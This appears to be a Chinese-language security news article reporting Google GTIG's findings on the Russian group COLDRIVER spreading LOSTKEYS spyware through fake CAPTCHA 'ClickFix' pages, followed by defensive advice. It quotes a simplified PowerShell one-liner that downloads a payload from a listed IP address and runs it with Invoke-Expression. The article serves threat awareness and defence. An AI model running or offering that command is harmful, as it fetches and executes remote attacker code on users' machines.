俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS，高价值目标面临数据窃取危机

导语

    近日，谷歌威胁情报组（GTIG）披露了一起由俄罗斯黑客组织COLDRIVER（又名Callisto、Star Blizzard）发起的网络攻击行动。该组织通过伪造的CAPTCHA验证页面（即“ClickFix”社会工程攻击手法），诱骗用户执行恶意代码，进而部署名为LOSTKEYS的新型间谍软件，窃取高价值目标的敏感数据。

1. 第一步：诱骗用户执行恶意指令

   攻击始于一个伪装成技术修复页面的虚假网站，用户会被要求“验证身份”以通过CAPTCHA检查。实际上，页面会诱导用户复制一段PowerShell命令并粘贴到Windows系统的“运行”对话框中执行。

   powershell
   # 示例恶意命令（已简化）
   $c = New-Object System.Net.WebClient;  
   $c.DownloadString("http://165.227.148.68/payload") | Invoke-Expression  

   该命令会从远程服务器（IP：165.227.148.68）下载后续恶意载荷。

2. 多阶段感染链

• 第二阶段：下载的脚本会进行环境检测（如是否为虚拟机），以规避安全分析。

• 第三阶段：通过Base64编码的PowerShell脚本解密并部署LOSTKEYS恶意软件。

3. LOSTKEYS的核心功能

• 窃取指定扩展名（如.docx、.pdf）的文件和系统信息；

• 收集运行进程列表并回传至攻击者服务器；

• 通过加密通道伪装合法HTTPS流量，躲避网络监控。

• 目标群体：西方政府前/现任顾问、军事人员、记者、智库、非政府组织（NGO）及与乌克兰相关的人员。

• 攻击时间线：2025年1月、3月及4月均观察到活跃攻击，且最早可追溯至2023年12月的伪装样本。

• 数据泄露后果：受害机构报告了知识产权盗窃和敏感通信内容外泄，攻击者可能长期潜伏并持续窃取数据。

    此前，COLDRIVER以钓鱼攻击窃取邮箱凭证为主，而LOSTKEYS的部署标志其转向定制化恶意软件攻击。该组织还曾开发另一款恶意软件SPICA，用于执行远程命令。其攻击模式与俄罗斯战略情报目标高度吻合，进一步强化了对其国家背景的研判。

1. 启用谷歌安全防护

• 使用Chrome浏览器的增强安全浏览（Enhanced Safe Browsing）功能；

• 高风险用户（如政府人员）可启用高级保护计划（Advanced Protection Program）。

2. 警惕社会工程陷阱

• 勿轻信要求执行代码的“验证”页面，尤其是通过非官方渠道收到的链接；

• 验证网站真实性，避免访问可疑域名。

3. 加强终端防护

• 定期更新系统及安全软件，阻断已知漏洞利用；

• 监控异常进程及网络流量，尤其是对非常用IP的连接。

ClickFix并非COLDRIVER专属工具，其作为一种跨平台社会工程框架，已被多个黑客组织采用。例如：

• Lampion银行木马：通过钓鱼邮件分发含恶意HTML的ZIP文件，诱导用户执行ClickFix指令；

• Atomic Stealer窃密软件：结合Binance智能链的EtherHiding技术隐藏恶意载荷；

• Slavic Nation Empire团伙：伪造Google Meet页面传播StealC、AMOS Stealer等恶意软件。

    LOSTKEYS的出现揭示了国家级黑客组织在攻击技术上的持续迭代。面对此类威胁，用户需提升安全意识，机构则应强化网络监控与威胁情报共享。谷歌等企业已通过安全浏览机制拦截恶意网站，但人为警惕仍是防御社会工程攻击的第一道防线。

原文始发于微信公众号（道玄网安驿站）：俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS，高价值目标面临数据窃取危机